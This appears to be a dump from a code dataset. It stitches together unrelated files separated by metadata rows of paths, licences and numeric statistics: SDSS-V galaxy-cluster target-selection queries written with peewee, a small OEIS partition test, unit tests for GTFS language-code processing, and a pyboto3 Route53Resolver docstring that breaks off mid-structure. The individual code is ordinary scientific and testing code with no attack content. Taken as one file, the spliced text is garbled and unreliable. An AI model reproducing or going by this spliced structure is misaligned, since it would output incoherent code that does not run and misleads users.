(ls.fibertotflux_z > fibertotflux_z_min_for_cadence1) |
(ls.gaia_phot_g_mean_mag.between(0.1, gaia_g_max_for_cadence1)) |
(ls.gaia_phot_rp_mean_mag.between(0.1, gaia_rp_max_for_cadence1))),
cadence1),
(ls.fibertotflux_r > fibertotflux_r_min_for_cadence2, cadence2),
(ls.fibertotflux_r <= fibertotflux_r_min_for_cadence2, cadence3),
),
cadence4)
# compute transformed SDSS mags for pointlike and extended sources separately
# transform the legacysurvey grz into sdss psfmag griz
# copy of routine for bhm_spiders_clusters_lsdr8
coeffs = {
"g2_e": -0.897719,
"g1_e": 2.298300,
"g0_e": -1.019299,
"i2_e": -0.950114,
"i1_e": 0.981972,
"i0_e": -0.261645,
"r2_e": -0.201741,
"r1_e": 0.697128,
"r0_e": -0.120926,
"z2_e": -1.424312,
"z1_e": 2.415301,
"z0_e": -0.677163,
}
nMgy_min = 1e-3 # equiv to AB=30
# extended - start from ls8 fiberfluxes
g0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_g)))
r0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_r)))
z0_e = (22.5 - 2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_z)))
g_r_e = (-2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_g) /
peewee.fn.greatest(nMgy_min, ls.fiberflux_r)))
r_z_e = (-2.5 * peewee.fn.log(peewee.fn.greatest(nMgy_min, ls.fiberflux_r) /
peewee.fn.greatest(nMgy_min, ls.fiberflux_z)))
g_e = (g0_e + coeffs['g0_e'] + coeffs['g1_e'] * g_r_e + coeffs['g2_e'] * g_r_e * g_r_e)
r_e = (r0_e + coeffs['r0_e'] + coeffs['r1_e'] * g_r_e + coeffs['r2_e'] * g_r_e * g_r_e)
i_e = (r0_e + coeffs['i0_e'] + coeffs['i1_e'] * r_z_e + coeffs['i2_e'] * r_z_e * r_z_e)
z_e = (z0_e + coeffs['z0_e'] + coeffs['z1_e'] * r_z_e + coeffs['z2_e'] * r_z_e * r_z_e)
# validity checks
valid = (g0_e.between(0.1, 29.9) &
r0_e.between(0.1, 29.9) &
z0_e.between(0.1, 29.9))
opt_prov = peewee.Case(None, ((valid, 'sdss_fiber2mag_from_lsdr8'),), 'undefined')
magnitude_g = peewee.Case(None, ((valid, g_e),), 'NaN')
magnitude_r = peewee.Case(None, ((valid, r_e),), 'NaN')
magnitude_i = peewee.Case(None, ((valid, i_e),), 'NaN')
magnitude_z = peewee.Case(None, ((valid, z_e),), 'NaN')
# # We want to switch between psfmags and fibertotmags depending on
# # ls.type parameter (PSF or extended)
# # For 'PSF' targets, we use psfmags, but for extended sources use fiber2mags
# opt_prov = peewee.Case(
# ls.type,
# (('PSF', 'ls_psfmag'),),
# 'ls_fibertotmag')
#
# magnitude_g = peewee.Case(
# ls.type,
# (('PSF', (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.flux_g))).cast('float')),),
# (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.fibertotflux_g))).cast('float'))
#
# magnitude_r = peewee.Case(
# ls.type,
# (('PSF', (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.flux_r))).cast('float')),),
# (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.fibertotflux_r))).cast('float'))
#
# magnitude_z = peewee.Case(
# ls.type,
# (('PSF', (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.flux_z))).cast('float')),),
# (22.5 - 2.5 * fn.log10(fn.greatest(flux30, ls.fibertotflux_z))).cast('float'))
#
# magnitude_i = peewee.Case(
# ls.type,
# (('PSF',
# (22.5 - 2.5 * fn.log10(
# fn.greatest(flux30, 0.5 * (ls.flux_r + ls.flux_z)))).cast('float')),),
# (22.5 - 2.5 * fn.log10(
# fn.greatest(flux30, 0.5 * (ls.fibertotflux_r +
# ls.fibertotflux_z)))).cast('float'))
spec_sn_thresh = self.parameters['spec_sn_thresh']
spec_z_err_thresh = self.parameters['spec_z_err_thresh']
query = (
c.select(
c.catalogid.alias('catalogid'),
ls.ls_id.alias('ls_id'), # extra
x.c.ero_detuid.cast('text').alias('ero_detuid'), # extra
c.ra.alias('ra'), # extra
c.dec.alias('dec'), # extra
priority.alias('priority'),
value.alias('value'),
cadence.alias('cadence'),
instrument.alias('instrument'),
opt_prov.alias('optical_prov'),
magnitude_g.alias('g'),
magnitude_r.alias('r'),
magnitude_i.alias('i'),
magnitude_z.alias('z'),
ls.gaia_phot_g_mean_mag.alias('gaia_g'),
ls.gaia_phot_bp_mean_mag.alias('bp'),
ls.gaia_phot_rp_mean_mag.alias('rp'),
inertial.alias('inertial'),
g0_e.alias('ls8_fibermag_g'), # extra
r0_e.alias('ls8_fibermag_r'), # extra
z0_e.alias('ls8_fibermag_z'), # extra
)
.join(c2ls)
.join(ls)
.join(x, on=(ls.ls_id == x.c.ls_id))
# start joining the spectroscopy
.switch(c)
.join(c2s16, JOIN.LEFT_OUTER)
.join(
s16, JOIN.LEFT_OUTER,
on=(
(c2s16.target_id == s16.c.specobjid) &
(c2s16.version_id == version_id)
)
)
.switch(c)
.join(c2s2020, JOIN.LEFT_OUTER)
.join(
s2020, JOIN.LEFT_OUTER,
on=(
(c2s2020.target_id == s2020.c.pk) &
(c2s2020.version_id == version_id)
)
)
.join(
sV, JOIN.LEFT_OUTER,
on=(
fn.q3c_join(sV.c.plug_ra, sV.c.plug_dec,
c.ra, c.dec,
match_radius_spectro)
)
)
# .join(
# sph, JOIN.LEFT_OUTER,
# on=(
# fn.q3c_join(sph.c.target_ra, sph.c.target_dec,
# c.ra, c.dec,
# match_radius_spectro)
# )
# )
# finished joining the spectroscopy
.where(
c.version_id == version_id,
c2ls.version_id == version_id,
c2ls.best >> True
)
.where(
s16.c.specobjid.is_null(True), # all of these must be satisfied
s2020.c.pk.is_null(True),
sV.c.specobjid.is_null(True),
# sph.c.pkey.is_null(True),
)
.where(
(
(ls.fibertotflux_r.between(fibertotflux_r_min, fibertotflux_r_max)) |
(ls.fibertotflux_z.between(fibertotflux_z_min, fibertotflux_z_max))
),
(x.c.target_has_spec == 0),
# gaia safety checks to avoid bad ls photometry
~(ls.gaia_phot_g_mean_mag.between(0.1, self.parameters['gaia_g_mag_limit'])),
~(ls.gaia_phot_rp_mean_mag.between(0.1, self.parameters['gaia_rp_mag_limit'])),
)
)
if query_region:
query = query.where(peewee.fn.q3c_radial_query(c.ra, c.dec,
query_region[0],
query_region[1],
query_region[2]))
return query
#
# END BhmSpidersClustersEfedsStragglersCarton
# ##################################################################################
class BhmSpidersClustersPs1dr2Carton(BaseCarton):
name = 'bhm_spiders_clusters_ps1dr2'
category = 'science'
mapper = 'BHM'
program = 'bhm_spiders'
tile = False
instrument = 'BOSS'
inertial = True
def build_query(self, version_id, query_region=None):
c = Catalog.alias()
ps = Panstarrs1.alias()
c2ps = CatalogToPanstarrs1.alias() # only exists after v0.5 cross-match
# s2020 = BHM_eFEDS_Veto.alias()
# sV = SDSSV_BOSS_SPALL.alias()
xx = EROSITASupersetClusters.alias()
x = (
xx
.select(
fn.rank().over(partition_by=[xx.ero_detuid],
order_by=[xx.xmatch_metric.desc()]).alias('x_rank'),
xx.ero_detuid.alias('ero_detuid'),
xx.ps1_dr2_id.alias('ps1_dr2_id'),
xx.target_has_spec.alias('target_has_spec'),
)
.where(
(xx.ero_version == self.parameters['ero_version']),
(xx.xmatch_method == self.parameters['xmatch_method']),
(xx.xmatch_version == self.parameters['xmatch_version']),
(xx.opt_cat == self.parameters['opt_cat']),
(xx.xmatch_metric > self.parameters['xmatch_metric_min']),
(xx.ero_det_like > self.parameters['det_like_min']),
)
.alias('x')
)
instrument = peewee.Value(self.instrument)
inertial = peewee.Value(self.inertial).cast('bool')
r_psf_flux_max = AB2Jy(self.parameters['r_psf_mag_min'])
i_psf_flux_max = AB2Jy(self.parameters['i_psf_mag_min'])
z_psf_flux_max = AB2Jy(self.parameters['z_psf_mag_min'])
r_psf_flux_min_for_cadence1 = AB2Jy(self.parameters['r_psf_mag_max_for_cadence1'])
i_psf_flux_min_for_cadence1 = AB2Jy(self.parameters['i_psf_mag_max_for_cadence1'])
z_psf_flux_min_for_cadence1 = AB2Jy(self.parameters['z_psf_mag_max_for_cadence1'])
r_psf_flux_min_for_cadence2 = AB2Jy(self.parameters['r_psf_mag_max_for_cadence2'])
i_psf_flux_min_for_cadence2 = AB2Jy(self.parameters['i_psf_mag_max_for_cadence2'])
z_psf_flux_min_for_cadence2 = AB2Jy(self.parameters['z_psf_mag_max_for_cadence2'])
# match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
# #########################################################################
# prepare the spectroscopy catalogues
match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
spec_sn_thresh = self.parameters['spec_sn_thresh']
spec_z_err_thresh = self.parameters['spec_z_err_thresh']
# SDSS DR16
c2s16 = CatalogToSDSS_DR16_SpecObj.alias()
ss16 = SDSS_DR16_SpecObj.alias()
s16 = (
ss16.select(
ss16.specobjid.alias('specobjid'),
)
.where(
ss16.snmedian >= spec_sn_thresh,
ss16.zwarning == 0,
ss16.zerr <= spec_z_err_thresh,
ss16.zerr > 0.0,
ss16.scienceprimary > 0,
)
.alias('s16')
)
# SDSS-IV/eFEDS March2020
c2s2020 = CatalogToBHM_eFEDS_Veto.alias()
ss2020 = BHM_eFEDS_Veto.alias()
s2020 = (
ss2020.select(
ss2020.pk.alias('pk'),
)
.where(
ss2020.sn_median_all >= spec_sn_thresh,
ss2020.zwarning == 0,
ss2020.z_err <= spec_z_err_thresh,
ss2020.z_err > 0.0,
)
.alias('s2020')
)
# SDSS-V spAll
ssV = SDSSV_BOSS_SPALL.alias()
sV = (
ssV.select(
ssV.specobjid.alias('specobjid'),
ssV.plug_ra.alias('plug_ra'),
ssV.plug_dec.alias('plug_dec'),
)
.where(
ssV.sn_median_all >= spec_sn_thresh,
ssV.zwarning == 0,
ssV.z_err <= spec_z_err_thresh,
ssV.z_err > 0.0,
ssV.specprimary > 0,
)
.alias('sV')
)
# SDSS-V plateholes - only consider plateholes that
# were drilled+shipped but that were not yet observed
ssph = SDSSV_Plateholes.alias()
ssphm = SDSSV_Plateholes_Meta.alias()
ssconf = SDSSV_BOSS_Conflist.alias()
sph = (
ssph.select(
ssph.pkey.alias('pkey'),
ssph.target_ra.alias('target_ra'),
ssph.target_dec.alias('target_dec'),
)
.join(
ssphm,
on=(ssph.yanny_uid == ssphm.yanny_uid)
)
.join(
ssconf, JOIN.LEFT_OUTER,
on=(ssphm.plateid == ssconf.plate)
)
.where(
(ssph.holetype == 'BOSS_SHARED'),
(ssph.sourcetype == 'SCI') | (ssph.sourcetype == 'STA'),
ssphm.isvalid > 0,
ssconf.plate.is_null(),
)
.alias('sph')
)
# priority is determined by target rank within cluster
# start with a priority floor value (per carton)
# then increment if any conditions are met:
priority = peewee.Case(
None,
(
(
x.c.x_rank == 1,
self.parameters['priority_floor_bcg']
),
(
x.c.x_rank > 1,
self.parameters['priority_floor_member'] +
fn.least(self.parameters['priority_levels'] - 2,
x.c.x_rank - 2)
),
),
None)
value = peewee.Case(
None,
(
(x.c.x_rank == 1, self.parameters['value_bcg']),
(x.c.x_rank > 1, self.parameters['value_member']),
),
None)
# choose cadence based on psf_flux magnitude in panstarrs1 g,r,i-bands
cadence1 = self.parameters['cadence1']
cadence2 = self.parameters['cadence2']
cadence3 = self.parameters['cadence3']
cadence4 = 'unknown_cadence'
cadence = peewee.Case(
None,
(
((ps.r_stk_psf_flux > r_psf_flux_min_for_cadence1) |
(ps.i_stk_psf_flux > i_psf_flux_min_for_cadence1) |
(ps.z_stk_psf_flux > z_psf_flux_min_for_cadence1), cadence1),
((ps.r_stk_psf_flux > r_psf_flux_min_for_cadence2) |
(ps.i_stk_psf_flux > i_psf_flux_min_for_cadence2) |
(ps.z_stk_psf_flux > z_psf_flux_min_for_cadence2), cadence2),
((ps.r_stk_psf_flux <= r_psf_flux_min_for_cadence2) &
(ps.i_stk_psf_flux <= i_psf_flux_min_for_cadence2) &
(ps.z_stk_psf_flux <= z_psf_flux_min_for_cadence2), cadence3),
),
cadence4)
# compute transformed SDSS mags for all sources uniformly
# transform the panstarrs1-dr2 griz into sdss psfmag griz
# extract coeffs from fit logs via:
# awk 'BEGIN {print("coeffs = {")} /POLYFIT/{ if($3~/sdss_psfmag/){pe="p"} else if ($3~/sdss_fiber2mag/){pe="e"} else{pe="error"}; printf("\"%s%d_%s\": %s,\n", substr($3,length($3)), $8, pe, $10)} END {print("}")}' bhm_spiders_clusters_ps1dr2/ps1dr2_stk_psf_to_sdss_fiber2mag_?_results.log # noqa
coeffs = {
"g2_e": -0.353294,
"g1_e": 0.699658,
"g0_e": 0.581569,
"i2_e": -0.446208,
"i1_e": 0.776628,
"i0_e": 0.421538,
"r2_e": -0.123243,
"r1_e": 0.401786,
"r0_e": 0.422531,
"z2_e": -0.488437,
"z1_e": 0.595132,
"z0_e": 0.439771,
}
Jy_min = AB2Jy(30.00)
# start from ps1dr2 stk psf fluxes
g0 = (8.9 - 2.5 * peewee.fn.log(peewee.fn.greatest(Jy_min, ps.g_stk_psf_flux)))
r0 = (8.9 - 2.5 * peewee.fn.log(peewee.fn.greatest(Jy_min, ps.r_stk_psf_flux)))
i0 = (8.9 - 2.5 * peewee.fn.log(peewee.fn.greatest(Jy_min, ps.i_stk_psf_flux)))
z0 = (8.9 - 2.5 * peewee.fn.log(peewee.fn.greatest(Jy_min, ps.z_stk_psf_flux)))
g_r = g0 - r0
r_i = r0 - i0
i_z = i0 - z0
# use single set of transform coeffs
g_e = (g0 + coeffs['g0_e'] + coeffs['g1_e'] * g_r + coeffs['g2_e'] * g_r * g_r)
r_e = (r0 + coeffs['r0_e'] + coeffs['r1_e'] * g_r + coeffs['r2_e'] * g_r * g_r)
i_e = (i0 + coeffs['i0_e'] + coeffs['i1_e'] * r_i + coeffs['i2_e'] * r_i * r_i)
z_e = (z0 + coeffs['z0_e'] + coeffs['z1_e'] * i_z + coeffs['z2_e'] * i_z * i_z)
# validity checks
valid = (g0.between(0.1, 29.9) &
r0.between(0.1, 29.9) &
i0.between(0.1, 29.9) &
z0.between(0.1, 29.9))
opt_prov = peewee.Case(None, ((valid, 'sdss_fiber2mag_from_ps1dr2'),), 'undefined')
magnitude_g = peewee.Case(None, ((valid, g_e),), 'NaN')
magnitude_r = peewee.Case(None, ((valid, r_e),), 'NaN')
magnitude_i = peewee.Case(None, ((valid, i_e),), 'NaN')
magnitude_z = peewee.Case(None, ((valid, z_e),), 'NaN')
# # We want to switch between psfmags and fibertotmags depending on
# # ps.flags EXT+EXT_ALT (i.e. extended sources)
# # For non-extended targets, we use psfmags, but for extended sources use apermag
# flux30 = AB2Jy(30.00)
# ps1_ext_flags = 8388608 + 16777216
# ps1_good_stack_flag = 134217728
# opt_prov = peewee.Case(
# ps.flags.bin_and(ps1_ext_flags),
# ((0, 'ps_psfmag'),),
# 'ps_apermag')
#
# magnitude_g = peewee.Case(
# ps.flags.bin_and(ps1_ext_flags),
# ((0, (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.g_stk_psf_flux))).cast('float')),),
# (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.g_stk_aper_flux))).cast('float'))
#
# magnitude_r = peewee.Case(
# ps.flags.bin_and(ps1_ext_flags),
# ((0, (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.r_stk_psf_flux))).cast('float')),),
# (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.r_stk_aper_flux))).cast('float'))
#
# magnitude_i = peewee.Case(
# ps.flags.bin_and(ps1_ext_flags),
# ((0, (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.i_stk_psf_flux))).cast('float')),),
# (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.i_stk_aper_flux))).cast('float'))
#
# magnitude_z = peewee.Case(
# ps.flags.bin_and(ps1_ext_flags),
# ((0, (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.z_stk_psf_flux))).cast('float')),),
# (8.9 - 2.5 * fn.log10(fn.greatest(flux30, ps.z_stk_aper_flux))).cast('float'))
# these control matching to spectroscopy
match_radius_spectro = self.parameters['spec_join_radius'] / 3600.0
spec_sn_thresh = self.parameters['spec_sn_thresh']
spec_z_err_thresh = self.parameters['spec_z_err_thresh']
# this controls use of bad panstarrs photometry
ps1_good_stack_flag = 134217728
query = (
c.select(
c.catalogid.alias('catalogid'),
ps.catid_objid.alias('ps1_catid_objid'), # extra
x.c.ero_detuid.cast('text').alias('ero_detuid'), # extra
c.ra.alias('ra'), # extra
c.dec.alias('dec'), # extra
priority.alias('priority'),
value.cast('float').alias('value'),
cadence.alias('cadence'),
instrument.alias('instrument'),
opt_prov.alias('optical_prov'),
magnitude_g.alias('g'),
magnitude_r.alias('r'),
magnitude_i.alias('i'),
magnitude_z.alias('z'),
(ps.flags.bin_and(ps1_good_stack_flag) > 0)
.cast('bool').alias('ps1_good_stack_flag'), # extra
inertial.alias('inertial'),
)
.join(c2ps)
.join(ps)
.join(x, on=(ps.catid_objid == x.c.ps1_dr2_id))
# start joining the spectroscopy
.switch(c)
.join(c2s16, JOIN.LEFT_OUTER)
.join(
s16, JOIN.LEFT_OUTER,
on=(
(c2s16.target_id == s16.c.specobjid) &
(c2s16.version_id == version_id)
)
)
.switch(c)
.join(c2s2020, JOIN.LEFT_OUTER)
.join(
s2020, JOIN.LEFT_OUTER,
on=(
(c2s2020.target_id == s2020.c.pk) &
(c2s2020.version_id == version_id)
)
)
.join(
sV, JOIN.LEFT_OUTER,
on=(
fn.q3c_join(sV.c.plug_ra, sV.c.plug_dec,
c.ra, c.dec,
match_radius_spectro)
)
)
.join(
sph, JOIN.LEFT_OUTER,
on=(
fn.q3c_join(sph.c.target_ra, sph.c.target_dec,
c.ra, c.dec,
match_radius_spectro)
)
)
# finished joining the spectroscopy
.where(
c.version_id == version_id,
c2ps.version_id == version_id,
c2ps.best >> True
)
.where(
s16.c.specobjid.is_null(True), # all of these must be satisfied
s2020.c.pk.is_null(True),
sV.c.specobjid.is_null(True),
sph.c.pkey.is_null(True),
)
.where(
(x.c.target_has_spec == 0),
(ps.r_stk_psf_flux < r_psf_flux_max),
(ps.i_stk_psf_flux < i_psf_flux_max),
(ps.z_stk_psf_flux < z_psf_flux_max),
(ps.r_stk_psf_flux != 'NaN'), # TODO check this is correct test via peewee
(ps.i_stk_psf_flux != 'NaN'),
(ps.z_stk_psf_flux != 'NaN'),
# TODO - check panstarrs photometry quality ??
# (ps.flags.bin_and(ps1_good_stack_flag) > 0),
# TODO gaia safety checks to avoid bad ls photometry???
)
.order_by(x.c.ps1_dr2_id, x.c.x_rank.asc())
.distinct([x.c.ps1_dr2_id, ]) # avoid duplicate entries
)
if query_region:
query = query.where(peewee.fn.q3c_radial_query(c.ra, c.dec,
query_region[0],
query_region[1],
query_region[2]))
return query
#
# END BhmSpidersClustersPs1dr2Carton
# ##################################################################################
| 39.761194
| 306
| 0.505693
| 5,471
| 47,952
| 4.158289
| 0.085176
| 0.056
| 0.016615
| 0.009495
| 0.896044
| 0.874198
| 0.847253
| 0.838418
| 0.813275
| 0.803692
| 0
| 0.05096
| 0.352603
| 47,952
| 1,205
| 307
| 39.794191
| 0.681871
| 0.205414
| 0
| 0.744681
| 0
| 0
| 0.076758
| 0.017205
| 0
| 0
| 0
| 0.00083
| 0
| 1
| 0.003546
| false
| 0
| 0.010638
| 0
| 0.046099
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
824ed28817701d4f456ca175ae87db76aadc007d
| 114
|
py
|
Python
|
tests/test_A000041.py
|
danielsimonney/oeis
|
16c1dd6e058e49b629f695acb82ec55dd5f052f9
|
[
"MIT"
] | null | null | null |
tests/test_A000041.py
|
danielsimonney/oeis
|
16c1dd6e058e49b629f695acb82ec55dd5f052f9
|
[
"MIT"
] | null | null | null |
tests/test_A000041.py
|
danielsimonney/oeis
|
16c1dd6e058e49b629f695acb82ec55dd5f052f9
|
[
"MIT"
] | null | null | null |
from oeis import A000041
def test_partitions():
assert A000041(0, 10) == [1, 1, 2, 3, 5, 7, 11, 15, 22, 30]
| 19
| 63
| 0.605263
| 21
| 114
| 3.238095
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.329545
| 0.22807
| 114
| 5
| 64
| 22.8
| 0.443182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8263a558c4bffa6bc492c9fc4c61ec578567fafd
| 4,960
|
py
|
Python
|
usecase/test/test_process_main_language_code_for_gtfs_metadata.py
|
MobilityData/mobility-database-interface
|
c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
|
[
"Apache-2.0"
] | 4
|
2021-03-12T10:40:47.000Z
|
2022-01-11T10:56:53.000Z
|
usecase/test/test_process_main_language_code_for_gtfs_metadata.py
|
MobilityData/mobility-database-interface
|
c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
|
[
"Apache-2.0"
] | 181
|
2021-03-09T15:27:51.000Z
|
2022-01-31T15:25:28.000Z
|
usecase/test/test_process_main_language_code_for_gtfs_metadata.py
|
MobilityData/mobility-database-interface
|
c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
from unittest import TestCase, mock
from unittest.mock import MagicMock, PropertyMock
from gtfs_kit.feed import Feed
from representation.gtfs_metadata import GtfsMetadata
from representation.gtfs_representation import GtfsRepresentation
from usecase.process_main_language_code_for_gtfs_metadata import (
process_main_language_code_for_gtfs_metadata,
AGENCY_LANG,
)
class TestProcessMainLanguageCodeForGtfsMetadata(TestCase):
def test_process_main_language_code_with_none(self):
self.assertRaises(TypeError, process_main_language_code_for_gtfs_metadata, None)
def test_process_main_language_code_with_invalid_gtfs_repr(self):
mock_gtfs_representation = MagicMock()
mock_gtfs_representation.__class__ = str
self.assertRaises(
TypeError,
process_main_language_code_for_gtfs_metadata,
mock_gtfs_representation,
)
def test_process_main_language_code_with_missing_files(self):
mock_dataset = MagicMock()
mock_dataset.__class__ = Feed
mock_metadata = MagicMock()
mock_metadata.__class__ = GtfsMetadata
mock_gtfs_representation = MagicMock()
mock_gtfs_representation.__class__ = GtfsRepresentation
type(mock_gtfs_representation).dataset = mock_dataset
type(mock_gtfs_representation).metadata = mock_metadata
under_test = process_main_language_code_for_gtfs_metadata(
mock_gtfs_representation
)
self.assertIsInstance(under_test, GtfsRepresentation)
mock_metadata.main_language_code.assert_not_called()
def test_process_main_language_code_with_missing_fields(self):
mock_agency = PropertyMock(return_value=pd.DataFrame({}))
mock_dataset = MagicMock()
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
mock_metadata = MagicMock()
mock_metadata.__class__ = GtfsMetadata
mock_gtfs_representation = MagicMock()
mock_gtfs_representation.__class__ = GtfsRepresentation
type(mock_gtfs_representation).dataset = mock_dataset
type(mock_gtfs_representation).metadata = mock_metadata
under_test = process_main_language_code_for_gtfs_metadata(
mock_gtfs_representation
)
self.assertIsInstance(under_test, GtfsRepresentation)
mock_metadata.main_language_code.assert_not_called()
def test_process_main_language_code_with_empty_file(self):
mock_agency = PropertyMock(return_value=pd.DataFrame({AGENCY_LANG: []}))
mock_dataset = MagicMock()
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
mock_metadata = MagicMock()
mock_metadata.__class__ = GtfsMetadata
mock_gtfs_representation = MagicMock()
mock_gtfs_representation.__class__ = GtfsRepresentation
type(mock_gtfs_representation).dataset = mock_dataset
type(mock_gtfs_representation).metadata = mock_metadata
under_test = process_main_language_code_for_gtfs_metadata(
mock_gtfs_representation
)
self.assertIsInstance(under_test, GtfsRepresentation)
mock_metadata.main_language_code.assert_not_called()
def test_process_main_language_code_with_non_string_language_code(self):
mock_agency = PropertyMock(return_value=pd.DataFrame({AGENCY_LANG: [0]}))
mock_dataset = MagicMock()
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
mock_metadata = MagicMock()
mock_metadata.__class__ = GtfsMetadata
mock_gtfs_representation = MagicMock()
mock_gtfs_representation.__class__ = GtfsRepresentation
type(mock_gtfs_representation).dataset = mock_dataset
type(mock_gtfs_representation).metadata = mock_metadata
under_test = process_main_language_code_for_gtfs_metadata(
mock_gtfs_representation
)
self.assertIsInstance(under_test, GtfsRepresentation)
mock_metadata.main_language_code.assert_not_called()
def test_process_main_language_code(self):
mock_agency = PropertyMock(return_value=pd.DataFrame({AGENCY_LANG: ["fr"]}))
mock_dataset = MagicMock()
mock_dataset.__class__ = Feed
type(mock_dataset).agency = mock_agency
mock_metadata = MagicMock()
mock_metadata.__class__ = GtfsMetadata
mock_gtfs_representation = MagicMock()
mock_gtfs_representation.__class__ = GtfsRepresentation
type(mock_gtfs_representation).dataset = mock_dataset
type(mock_gtfs_representation).metadata = mock_metadata
under_test = process_main_language_code_for_gtfs_metadata(
mock_gtfs_representation
)
self.assertIsInstance(under_test, GtfsRepresentation)
mock_agency.assert_called()
self.assertEqual(mock_metadata.main_language_code, "fr")
| 40
| 88
| 0.740121
| 531
| 4,960
| 6.329567
| 0.107345
| 0.155311
| 0.183279
| 0.109491
| 0.87831
| 0.869979
| 0.869979
| 0.815234
| 0.769414
| 0.769414
| 0
| 0.000252
| 0.201411
| 4,960
| 123
| 89
| 40.325203
| 0.848271
| 0
| 0
| 0.66
| 0
| 0
| 0.000806
| 0
| 0
| 0
| 0
| 0
| 0.13
| 1
| 0.07
| false
| 0
| 0.07
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8265c2605b617170b38c2361baa3c2952da6015b
| 95,184
|
py
|
Python
|
pyboto3/route53resolver.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/route53resolver.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/route53resolver.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def associate_resolver_endpoint_ip_address(ResolverEndpointId=None, IpAddress=None):
"""
Adds IP addresses to an inbound or an outbound resolver endpoint. If you want to adding more than one IP address, submit one AssociateResolverEndpointIpAddress request for each IP address.
To remove an IP address from an endpoint, see DisassociateResolverEndpointIpAddress .
See also: AWS API Documentation
Exceptions
:example: response = client.associate_resolver_endpoint_ip_address(
ResolverEndpointId='string',
IpAddress={
'IpId': 'string',
'SubnetId': 'string',
'Ip': 'string'
}
)
:type ResolverEndpointId: string
:param ResolverEndpointId: [REQUIRED]\nThe ID of the resolver endpoint that you want to associate IP addresses with.\n
:type IpAddress: dict
:param IpAddress: [REQUIRED]\nEither the IPv4 address that you want to add to a resolver endpoint or a subnet ID. If you specify a subnet ID, Resolver chooses an IP address for you from the available IPs in the specified subnet.\n\nIpId (string) --\nOnly when removing an IP address from a resolver endpoint : The ID of the IP address that you want to remove. To get this ID, use GetResolverEndpoint .\n\nSubnetId (string) --The ID of the subnet that includes the IP address that you want to update. To get this ID, use GetResolverEndpoint .\n\nIp (string) --The new IP address.\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ResolverEndpoint': {
'Id': 'string',
